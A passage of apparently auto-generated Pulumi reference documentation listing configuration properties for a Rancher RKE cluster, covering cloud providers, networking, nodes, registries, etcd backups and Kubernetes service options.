* `cloudProviderRateLimit` (`pulumi.Input[bool]`) - (bool)
* `cloudProviderRateLimitBucket` (`pulumi.Input[float]`) - (int)
* `cloudProviderRateLimitQps` (`pulumi.Input[float]`) - (int)
* `loadBalancerSku` (`pulumi.Input[str]`)
* `location` (`pulumi.Input[str]`) - (string)
* `maximumLoadBalancerRuleCount` (`pulumi.Input[float]`) - (int)
* `primaryAvailabilitySetName` (`pulumi.Input[str]`) - (string)
* `primaryScaleSetName` (`pulumi.Input[str]`) - (string)
* `resourceGroup` (`pulumi.Input[str]`) - (string)
* `routeTableName` (`pulumi.Input[str]`) - (string)
* `securityGroupName` (`pulumi.Input[str]`) - (string)
* `subnetName` (`pulumi.Input[str]`) - (string)
* `subscriptionId` (`pulumi.Input[str]`) - (string)
* `tenantId` (`pulumi.Input[str]`) - Required if `tenant_name` not provided. (string)
* `useInstanceMetadata` (`pulumi.Input[bool]`) - (bool)
* `useManagedIdentityExtension` (`pulumi.Input[bool]`) - (bool)
* `vmType` (`pulumi.Input[str]`) - (string)
* `vnetName` (`pulumi.Input[str]`) - (string)
* `vnetResourceGroup` (`pulumi.Input[str]`) - (string)
* `azureCloudProvider` (`pulumi.Input[dict]`) - Azure Cloud Provider config [rke-azure-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/azure/) (list maxitems:1)
* `aadClientCertPassword` (`pulumi.Input[str]`) - (string)
* `aadClientCertPath` (`pulumi.Input[str]`) - (string)
* `aadClientId` (`pulumi.Input[str]`) - (string)
* `aadClientSecret` (`pulumi.Input[str]`) - (string)
* `cloud` (`pulumi.Input[str]`) - (string)
* `cloudProviderBackoff` (`pulumi.Input[bool]`) - (bool)
* `cloudProviderBackoffDuration` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffExponent` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffJitter` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffRetries` (`pulumi.Input[float]`) - (int)
* `cloudProviderRateLimit` (`pulumi.Input[bool]`) - (bool)
* `cloudProviderRateLimitBucket` (`pulumi.Input[float]`) - (int)
* `cloudProviderRateLimitQps` (`pulumi.Input[float]`) - (int)
* `loadBalancerSku` (`pulumi.Input[str]`)
* `location` (`pulumi.Input[str]`) - (string)
* `maximumLoadBalancerRuleCount` (`pulumi.Input[float]`) - (int)
* `primaryAvailabilitySetName` (`pulumi.Input[str]`) - (string)
* `primaryScaleSetName` (`pulumi.Input[str]`) - (string)
* `resourceGroup` (`pulumi.Input[str]`) - (string)
* `routeTableName` (`pulumi.Input[str]`) - (string)
* `securityGroupName` (`pulumi.Input[str]`) - (string)
* `subnetName` (`pulumi.Input[str]`) - (string)
* `subscriptionId` (`pulumi.Input[str]`) - (string)
* `tenantId` (`pulumi.Input[str]`) - Required if `tenant_name` not provided. (string)
* `useInstanceMetadata` (`pulumi.Input[bool]`) - (bool)
* `useManagedIdentityExtension` (`pulumi.Input[bool]`) - (bool)
* `vmType` (`pulumi.Input[str]`) - (string)
* `vnetName` (`pulumi.Input[str]`) - (string)
* `vnetResourceGroup` (`pulumi.Input[str]`) - (string)
* `customCloudConfig` (`pulumi.Input[str]`) - Use custom_cloud_provider instead
* `customCloudProvider` (`pulumi.Input[str]`) - Custom Cloud Provider config (string)
* `name` (`pulumi.Input[str]`) - Name of virtualcenter config for Vsphere Cloud Provider config (string)
* `openstackCloudConfig` (`pulumi.Input[dict]`) - Use openstack_cloud_provider instead
* `blockStorage` (`pulumi.Input[dict]`) - (list maxitems:1)
* `bsVersion` (`pulumi.Input[str]`) - (string)
* `ignoreVolumeAz` (`pulumi.Input[bool]`) - (string)
* `trustDevicePath` (`pulumi.Input[bool]`) - (string)
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `authUrl` (`pulumi.Input[str]`) - (string)
* `caFile` (`pulumi.Input[str]`) - (string)
* `domainId` (`pulumi.Input[str]`) - Required if `domain_name` not provided. (string)
* `domainName` (`pulumi.Input[str]`) - Required if `domain_id` not provided. (string)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `tenantId` (`pulumi.Input[str]`) - Required if `tenant_name` not provided. (string)
* `tenantName` (`pulumi.Input[str]`) - Required if `tenant_id` not provided. (string)
* `trustId` (`pulumi.Input[str]`) - (string)
* `userId` (`pulumi.Input[str]`) - Required if `username` not provided. (string)
* `username` (`pulumi.Input[str]`) - Required if `user_id` not provided. (string)
* `loadBalancer` (`pulumi.Input[dict]`) - (list maxitems:1)
* `createMonitor` (`pulumi.Input[bool]`) - (bool)
* `floatingNetworkId` (`pulumi.Input[str]`) - (string)
* `lbMethod` (`pulumi.Input[str]`) - (string)
* `lbProvider` (`pulumi.Input[str]`) - (string)
* `lbVersion` (`pulumi.Input[str]`) - (string)
* `manageSecurityGroups` (`pulumi.Input[bool]`) - (bool)
* `monitorDelay` (`pulumi.Input[str]`) - Default `60s` (string)
* `monitorMaxRetries` (`pulumi.Input[float]`) - Default 5 (int)
* `monitorTimeout` (`pulumi.Input[str]`) - Default `30s` (string)
* `subnetId` (`pulumi.Input[str]`) - (string)
* `useOctavia` (`pulumi.Input[bool]`) - (bool)
* `metadata` (`pulumi.Input[dict]`) - (list maxitems:1)
* `requestTimeout` (`pulumi.Input[float]`) - (int)
* `searchOrder` (`pulumi.Input[str]`) - (string)
* `route` (`pulumi.Input[dict]`) - (list maxitems:1)
* `routerId` (`pulumi.Input[str]`) - (string)
* `openstackCloudProvider` (`pulumi.Input[dict]`) - Openstack Cloud Provider config [rke-openstack-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/openstack/) (list maxitems:1)
* `blockStorage` (`pulumi.Input[dict]`) - (list maxitems:1)
* `bsVersion` (`pulumi.Input[str]`) - (string)
* `ignoreVolumeAz` (`pulumi.Input[bool]`) - (string)
* `trustDevicePath` (`pulumi.Input[bool]`) - (string)
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `authUrl` (`pulumi.Input[str]`) - (string)
* `caFile` (`pulumi.Input[str]`) - (string)
* `domainId` (`pulumi.Input[str]`) - Required if `domain_name` not provided. (string)
* `domainName` (`pulumi.Input[str]`) - Required if `domain_id` not provided. (string)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `tenantId` (`pulumi.Input[str]`) - Required if `tenant_name` not provided. (string)
* `tenantName` (`pulumi.Input[str]`) - Required if `tenant_id` not provided. (string)
* `trustId` (`pulumi.Input[str]`) - (string)
* `userId` (`pulumi.Input[str]`) - Required if `username` not provided. (string)
* `username` (`pulumi.Input[str]`) - Required if `user_id` not provided. (string)
* `loadBalancer` (`pulumi.Input[dict]`) - (list maxitems:1)
* `createMonitor` (`pulumi.Input[bool]`) - (bool)
* `floatingNetworkId` (`pulumi.Input[str]`) - (string)
* `lbMethod` (`pulumi.Input[str]`) - (string)
* `lbProvider` (`pulumi.Input[str]`) - (string)
* `lbVersion` (`pulumi.Input[str]`) - (string)
* `manageSecurityGroups` (`pulumi.Input[bool]`) - (bool)
* `monitorDelay` (`pulumi.Input[str]`) - Default `60s` (string)
* `monitorMaxRetries` (`pulumi.Input[float]`) - Default 5 (int)
* `monitorTimeout` (`pulumi.Input[str]`) - Default `30s` (string)
* `subnetId` (`pulumi.Input[str]`) - (string)
* `useOctavia` (`pulumi.Input[bool]`) - (bool)
* `metadata` (`pulumi.Input[dict]`) - (list maxitems:1)
* `requestTimeout` (`pulumi.Input[float]`) - (int)
* `searchOrder` (`pulumi.Input[str]`) - (string)
* `route` (`pulumi.Input[dict]`) - (list maxitems:1)
* `routerId` (`pulumi.Input[str]`) - (string)
* `vsphereCloudConfig` (`pulumi.Input[dict]`) - Use vsphere_cloud_provider instead
* `disk` (`pulumi.Input[dict]`) - (list maxitems:1)
* `scsiControllerType` (`pulumi.Input[str]`) - (string)
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `datacenter` (`pulumi.Input[str]`) - (string)
* `datacenters` (`pulumi.Input[str]`) - (string)
* `datastore` (`pulumi.Input[str]`) - (string)
* `insecureFlag` (`pulumi.Input[bool]`) - (bool)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`pulumi.Input[float]`) - (int)
* `user` (`pulumi.Input[str]`) - Registry user (string)
* `vmName` (`pulumi.Input[str]`) - (string)
* `vmUuid` (`pulumi.Input[str]`) - (string)
* `workingDir` (`pulumi.Input[str]`) - (string)
* `network` (`pulumi.Input[dict]`) - (list maxitems:1)
* `publicNetwork` (`pulumi.Input[str]`) - (string)
* `virtualCenters` (`pulumi.Input[list]`) - (List)
* `datacenters` (`pulumi.Input[str]`) - (string)
* `name` (`pulumi.Input[str]`) - Name of virtualcenter config for Vsphere Cloud Provider config (string)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`pulumi.Input[float]`) - (int)
* `user` (`pulumi.Input[str]`) - Registry user (string)
* `workspace` (`pulumi.Input[dict]`) - (list maxitems:1)
* `datacenter` (`pulumi.Input[str]`) - (string)
* `defaultDatastore` (`pulumi.Input[str]`) - (string)
* `folder` (`pulumi.Input[str]`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `resourcepoolPath` (`pulumi.Input[str]`) - (string)
* `server` (`pulumi.Input[str]`) - (string)
* `vsphereCloudProvider` (`pulumi.Input[dict]`) - Vsphere Cloud Provider config [rke-vsphere-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/vsphere/) Extra argument `name` is required on `virtual_center` configuration. (list maxitems:1)
* `disk` (`pulumi.Input[dict]`) - (list maxitems:1)
* `scsiControllerType` (`pulumi.Input[str]`) - (string)
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `datacenter` (`pulumi.Input[str]`) - (string)
* `datacenters` (`pulumi.Input[str]`) - (string)
* `datastore` (`pulumi.Input[str]`) - (string)
* `insecureFlag` (`pulumi.Input[bool]`) - (bool)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`pulumi.Input[float]`) - (int)
* `user` (`pulumi.Input[str]`) - Registry user (string)
* `vmName` (`pulumi.Input[str]`) - (string)
* `vmUuid` (`pulumi.Input[str]`) - (string)
* `workingDir` (`pulumi.Input[str]`) - (string)
* `network` (`pulumi.Input[dict]`) - (list maxitems:1)
* `publicNetwork` (`pulumi.Input[str]`) - (string)
* `virtualCenters` (`pulumi.Input[list]`) - (List)
* `datacenters` (`pulumi.Input[str]`) - (string)
* `name` (`pulumi.Input[str]`) - Name of virtualcenter config for Vsphere Cloud Provider config (string)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`pulumi.Input[float]`) - (int)
* `user` (`pulumi.Input[str]`) - Registry user (string)
* `workspace` (`pulumi.Input[dict]`) - (list maxitems:1)
* `datacenter` (`pulumi.Input[str]`) - (string)
* `defaultDatastore` (`pulumi.Input[str]`) - (string)
* `folder` (`pulumi.Input[str]`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `resourcepoolPath` (`pulumi.Input[str]`) - (string)
* `server` (`pulumi.Input[str]`) - (string)
The **dns** object supports the following:
* `nodeSelector` (`pulumi.Input[dict]`) - Node selector key pair (map)
* `provider` (`pulumi.Input[str]`) - Monitoring provider (string)
* `reverseCidrs` (`pulumi.Input[list]`) - Reverse CIDRs (list)
* `upstreamNameservers` (`pulumi.Input[list]`) - Upstream nameservers (list)
The **ingress** object supports the following:
* `dnsPolicy` (`pulumi.Input[str]`) - Ingress controller DNS policy. `ClusterFirstWithHostNet`, `ClusterFirst`, `Default`, and `None` are supported. [K8S dns Policy](https://kubernetes.io/docs/concepts/services-networking/dns-pod-service/#pod-s-dns-policy) (string)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `nodeSelector` (`pulumi.Input[dict]`) - Node selector key pair (map)
* `options` (`pulumi.Input[dict]`) - Network provider options (map)
* `provider` (`pulumi.Input[str]`) - Monitoring provider (string)
The **monitoring** object supports the following:
* `nodeSelector` (`pulumi.Input[dict]`) - Node selector key pair (map)
* `options` (`pulumi.Input[dict]`) - Network provider options (map)
* `provider` (`pulumi.Input[str]`) - Monitoring provider (string)
The **network** object supports the following:
* `calicoNetworkProvider` (`pulumi.Input[dict]`) - Calico network provider config (list maxitems:1)
* `cloud_provider` (`pulumi.Input[str]`) - Calico cloud provider (string)
* `canalNetworkProvider` (`pulumi.Input[dict]`) - Canal network provider config (list maxitems:1)
* `iface` (`pulumi.Input[str]`) - Flannel network interface (string)
* `flannelNetworkProvider` (`pulumi.Input[dict]`) - Flannel network provider config (list maxitems:1)
* `iface` (`pulumi.Input[str]`) - Flannel network interface (string)
* `mtu` (`pulumi.Input[float]`) - Network provider MTU. Default `0` (int)
* `options` (`pulumi.Input[dict]`) - Network provider options (map)
* `plugin` (`pulumi.Input[str]`) - Network provider plugin. `calico`, `canal` (default), `flannel`, `none` and `weave` are supported. (string)
* `weaveNetworkProvider` (`pulumi.Input[dict]`) - Weave network provider config (list maxitems:1)
* `password` (`pulumi.Input[str]`) - Registry password (string)
The **nodes** object supports the following:
* `address` (`pulumi.Input[str]`) - Address ip for node (string)
* `dockerSocket` (`pulumi.Input[str]`) - Docker socket on the node that will be used in tunneling (string)
* `hostnameOverride` (`pulumi.Input[str]`) - Hostname override for node (string)
* `internalAddress` (`pulumi.Input[str]`) - Internal address that will be used for components communication (string)
* `labels` (`pulumi.Input[dict]`) - Node labels (map)
* `nodeName` (`pulumi.Input[str]`) - Name of the host provisioned via docker machine (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
* `roles` (`pulumi.Input[list]`) - Node roles in k8s cluster. `controlplane`, `etcd` and `worker` are supported. (list)
* `rolesDeprecated` (`pulumi.Input[str]`)
* `ssh_agent_auth` (`pulumi.Input[bool]`) - SSH Agent Auth enable (bool)
* `sshCert` (`pulumi.Input[str]`) - SSH Certificate (string)
* `ssh_cert_path` (`pulumi.Input[str]`) - SSH Certificate path (string)
* `sshKey` (`pulumi.Input[str]`) - SSH Private Key (string)
* `ssh_key_path` (`pulumi.Input[str]`) - SSH Private Key path (string)
* `taints` (`pulumi.Input[list]`) - Node taints (list)
* `effect` (`pulumi.Input[str]`) - Taint effect. `NoExecute`, `NoSchedule` (default) and `PreferNoSchedule` are supported (string)
* `key` (`pulumi.Input[str]`) - TLS key for etcd service (string)
* `value` (`pulumi.Input[str]`) - Taint value (string)
* `user` (`pulumi.Input[str]`) - Registry user (string)
The **private_registries** object supports the following:
* `isDefault` (`pulumi.Input[bool]`) - Set as default registry. Default `false` (bool)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `url` (`pulumi.Input[str]`) - Registry URL (string)
* `user` (`pulumi.Input[str]`) - Registry user (string)
The **restore** object supports the following:
* `restore` (`pulumi.Input[bool]`) - Restore cluster. Default `false` (bool)
* `snapshotName` (`pulumi.Input[str]`) - Snapshot name (string)
The **rotate_certificates** object supports the following:
* `caCertificates` (`pulumi.Input[bool]`) - Rotate CA Certificates. Default `false` (bool)
* `services` (`pulumi.Input[list]`) - Services to rotate their certs. `etcd`, `kubelet`, `kube-apiserver`, `kube-proxy`, `kube-scheduler` and `kube-controller-manager` are supported (list)
The **services** object supports the following:
* `etcd` (`pulumi.Input[dict]`) - Docker image for etcd (string)
* `backupConfig` (`pulumi.Input[dict]`) - Backup options for etcd service. Just for Rancher v2.2.x (list maxitems:1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `intervalHours` (`pulumi.Input[float]`) - Interval hours for etcd backup. Default `12` (int)
* `retention` (`pulumi.Input[float]`) - Retention for etcd backup. Default `6` (int)
* `s3BackupConfig` (`pulumi.Input[dict]`) - S3 config options for etcd backup (list maxitems:1)
* `accessKey` (`pulumi.Input[str]`) - Access key for S3 service (string)
* `bucketName` (`pulumi.Input[str]`) - Bucket name for S3 service (string)
* `customCa` (`pulumi.Input[str]`) - Base64 encoded custom CA for S3 service. Use filebase64(<FILE>) for encoding file. Available from Rancher v2.2.5 (string)
* `endpoint` (`pulumi.Input[str]`) - Endpoint for S3 service (string)
* `folder` (`pulumi.Input[str]`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `secretKey` (`pulumi.Input[str]`) - Secret key for S3 service (string)
* `safeTimestamp` (`pulumi.Input[bool]`) - Safe timestamp for etcd backup. Default: `false` (bool)
* `caCert` (`pulumi.Input[str]`) - TLS CA certificate for etcd service (string)
* `cert` (`pulumi.Input[str]`) - TLS certificate for etcd service (string)
* `creation` (`pulumi.Input[str]`) - Creation option for etcd service (string)
* `externalUrls` (`pulumi.Input[list]`) - External urls for etcd service (list)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `gid` (`pulumi.Input[float]`) - Etcd service GID. Default: `0`. For Rancher v2.3.x or above (int)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `key` (`pulumi.Input[str]`) - TLS key for etcd service (string)
* `path` (`pulumi.Input[str]`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `retention` (`pulumi.Input[str]`) - Retention for etcd backup. Default `6` (int)
* `snapshot` (`pulumi.Input[bool]`) - Snapshot option for etcd service. Default `true` (bool)
* `uid` (`pulumi.Input[float]`) - Etcd service UID. Default: `0`. For Rancher v2.3.x or above (int)
* `kubeApi` (`pulumi.Input[dict]`) - Kube API options for RKE services (list maxitems:1)
* `alwaysPullImages` (`pulumi.Input[bool]`) - Enable [AlwaysPullImages](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#alwayspullimages) Admission controller plugin. [Rancher docs](https://rancher.com/docs/rke/latest/en/config-options/services/#kubernetes-api-server-options) Default: `false` (bool)
* `auditLog` (`pulumi.Input[dict]`) - K8s audit log configuration. (list maxitem: 1)
* `configuration` (`pulumi.Input[dict]`) - Audit log configuration. (list maxtiem: 1)
* `format` (`pulumi.Input[str]`) - Audit log format. Default: `json` (string)
* `maxAge` (`pulumi.Input[float]`) - Audit log max age. Default: `30` (int)
* `maxBackup` (`pulumi.Input[float]`) - Audit log max backup. Default: `10` (int)
* `maxSize` (`pulumi.Input[float]`) - Audit log max size. Default: `100` (int)
* `path` (`pulumi.Input[str]`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `policy` (`pulumi.Input[str]`) - Audit policy json encoded definition. `"apiVersion"` and `"kind":"Policy","rules"` fields are required in the json. Ex. `jsonencode({"apiVersion":"audit.k8s.io/v1","kind":"Policy","rules":[{"level":"RequestResponse","resources":[{"group":"","resources":["pods"]}]}]})` [More info](https://rancher.com/docs/rke/latest/en/config-options/audit-log/) (string)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `eventRateLimit` (`pulumi.Input[dict]`) - K8s event rate limit configuration. (list maxitem: 1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `podSecurityPolicy` (`pulumi.Input[bool]`) - Pod Security Policy option for kube API service. Default `false` (bool)
* `secretsEncryptionConfig` (`pulumi.Input[dict]`) - [Encrypt k8s secret data configration](https://rancher.com/docs/rke/latest/en/config-options/secrets-encryption/). (list maxitem: 1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `serviceClusterIpRange` (`pulumi.Input[str]`) - Service Cluster ip Range option for kube controller service (string)
* `serviceNodePortRange` (`pulumi.Input[str]`) - Service Node Port Range option for kube API service (string)
* `kubeController` (`pulumi.Input[dict]`) - Kube Controller options for RKE services (list maxitems:1)
* `cluster_cidr` (`pulumi.Input[str]`) - Cluster CIDR option for kube controller service (string)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `serviceClusterIpRange` (`pulumi.Input[str]`) - Service Cluster ip Range option for kube controller service (string)
* `kubelet` (`pulumi.Input[dict]`) - Kubelet options for RKE services (list maxitems:1)
* `cluster_dns_server` (`pulumi.Input[str]`) - Cluster DNS Server option for kubelet service (string)
* `cluster_domain` (`pulumi.Input[str]`) - Cluster Domain option for kubelet service. Default `cluster.local` (string)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `failSwapOn` (`pulumi.Input[bool]`) - Enable or disable failing when swap on is not supported (bool)
* `generate_serving_certificate` [Generate a certificate signed by the kube-ca](https://rancher.com/docs/rke/latest/en/config-options/services/#kubelet-serving-certificate-requirements). Default `false` (bool)
* `generateServingCertificate` (`pulumi.Input[bool]`)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `infraContainerImage` (`pulumi.Input[str]`) - Infra container image for kubelet service (string)
* `kubeproxy` (`pulumi.Input[dict]`) - Kubeproxy options for RKE services (list maxitems:1)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `scheduler` (`pulumi.Input[dict]`) - Scheduler options for RKE services (list maxitems:1)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
The **services_etcd_deprecated** object supports the following:
* `backupConfig` (`pulumi.Input[dict]`) - Backup options for etcd service. Just for Rancher v2.2.x (list maxitems:1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `intervalHours` (`pulumi.Input[float]`) - Interval hours for etcd backup. Default `12` (int)
* `retention` (`pulumi.Input[float]`) - Retention for etcd backup. Default `6` (int)
* `s3BackupConfig` (`pulumi.Input[dict]`) - S3 config options for etcd backup (list maxitems:1)
* `accessKey` (`pulumi.Input[str]`) - Access key for S3 service (string)
* `bucketName` (`pulumi.Input[str]`) - Bucket name for S3 service (string)
* `customCa` (`pulumi.Input[str]`) - Base64 encoded custom CA for S3 service. Use filebase64(<FILE>) for encoding file. Available from Rancher v2.2.5 (string)
* `endpoint` (`pulumi.Input[str]`) - Endpoint for S3 service (string)
* `folder` (`pulumi.Input[str]`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `secretKey` (`pulumi.Input[str]`) - Secret key for S3 service (string)
* `safeTimestamp` (`pulumi.Input[bool]`) - Safe timestamp for etcd backup. Default: `false` (bool)
* `caCert` (`pulumi.Input[str]`) - TLS CA certificate for etcd service (string)
* `cert` (`pulumi.Input[str]`) - TLS certificate for etcd service (string)
* `creation` (`pulumi.Input[str]`) - Creation option for etcd service (string)
* `externalUrls` (`pulumi.Input[list]`) - External urls for etcd service (list)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `gid` (`pulumi.Input[float]`) - Etcd service GID. Default: `0`. For Rancher v2.3.x or above (int)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `key` (`pulumi.Input[str]`) - TLS key for etcd service (string)
* `path` (`pulumi.Input[str]`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `retention` (`pulumi.Input[str]`) - Retention for etcd backup. Default `6` (int)
* `snapshot` (`pulumi.Input[bool]`) - Snapshot option for etcd service. Default `true` (bool)
* `uid` (`pulumi.Input[float]`) - Etcd service UID. Default: `0`. For Rancher v2.3.x or above (int)
The **services_kube_api_deprecated** object supports the following:
* `alwaysPullImages` (`pulumi.Input[bool]`) - Enable [AlwaysPullImages](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#alwayspullimages) Admission controller plugin. [Rancher docs](https://rancher.com/docs/rke/latest/en/config-options/services/#kubernetes-api-server-options) Default: `false` (bool)
* `auditLog` (`pulumi.Input[dict]`) - K8s audit log configuration. (list maxitem: 1)
* `configuration` (`pulumi.Input[dict]`) - Audit log configuration. (list maxtiem: 1)
* `format` (`pulumi.Input[str]`) - Audit log format. Default: `json` (string)
* `maxAge` (`pulumi.Input[float]`) - Audit log max age. Default: `30` (int)
* `maxBackup` (`pulumi.Input[float]`) - Audit log max backup. Default: `10` (int)
* `maxSize` (`pulumi.Input[float]`) - Audit log max size. Default: `100` (int)
* `path` (`pulumi.Input[str]`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `policy` (`pulumi.Input[str]`) - Audit policy json encoded definition. `"apiVersion"` and `"kind":"Policy","rules"` fields are required in the json. Ex. `jsonencode({"apiVersion":"audit.k8s.io/v1","kind":"Policy","rules":[{"level":"RequestResponse","resources":[{"group":"","resources":["pods"]}]}]})` [More info](https://rancher.com/docs/rke/latest/en/config-options/audit-log/) (string)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `eventRateLimit` (`pulumi.Input[dict]`) - K8s event rate limit configuration. (list maxitem: 1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `podSecurityPolicy` (`pulumi.Input[bool]`) - Pod Security Policy option for kube API service. Default `false` (bool)
* `secretsEncryptionConfig` (`pulumi.Input[dict]`) - [Encrypt k8s secret data configration](https://rancher.com/docs/rke/latest/en/config-options/secrets-encryption/). (list maxitem: 1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `serviceClusterIpRange` (`pulumi.Input[str]`) - Service Cluster ip Range option for kube controller service (string)
* `serviceNodePortRange` (`pulumi.Input[str]`) - Service Node Port Range option for kube API service (string)
The **services_kube_controller_deprecated** object supports the following:
* `cluster_cidr` (`pulumi.Input[str]`) - Cluster CIDR option for kube controller service (string)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `serviceClusterIpRange` (`pulumi.Input[str]`) - Service Cluster ip Range option for kube controller service (string)
The **services_kube_proxy_deprecated** object supports the following:
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
The **services_kube_scheduler_deprecated** object supports the following:
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
The **services_kubelet_deprecated** object supports the following:
* `cluster_dns_server` (`pulumi.Input[str]`) - Cluster DNS Server option for kubelet service (string)
* `cluster_domain` (`pulumi.Input[str]`) - Cluster Domain option for kubelet service. Default `cluster.local` (string)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `failSwapOn` (`pulumi.Input[bool]`) - Enable or disable failing when swap on is not supported (bool)
* `generate_serving_certificate` [Generate a certificate signed by the kube-ca](https://rancher.com/docs/rke/latest/en/config-options/services/#kubelet-serving-certificate-requirements). Default `false` (bool)
* `generateServingCertificate` (`pulumi.Input[bool]`)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `infraContainerImage` (`pulumi.Input[str]`) - Infra container image for kubelet service (string)
The **system_images** object supports the following:
* `alpine` (`pulumi.Input[str]`) - Docker image for alpine (string)
* `calicoCni` (`pulumi.Input[str]`) - Docker image for calico_cni (string)
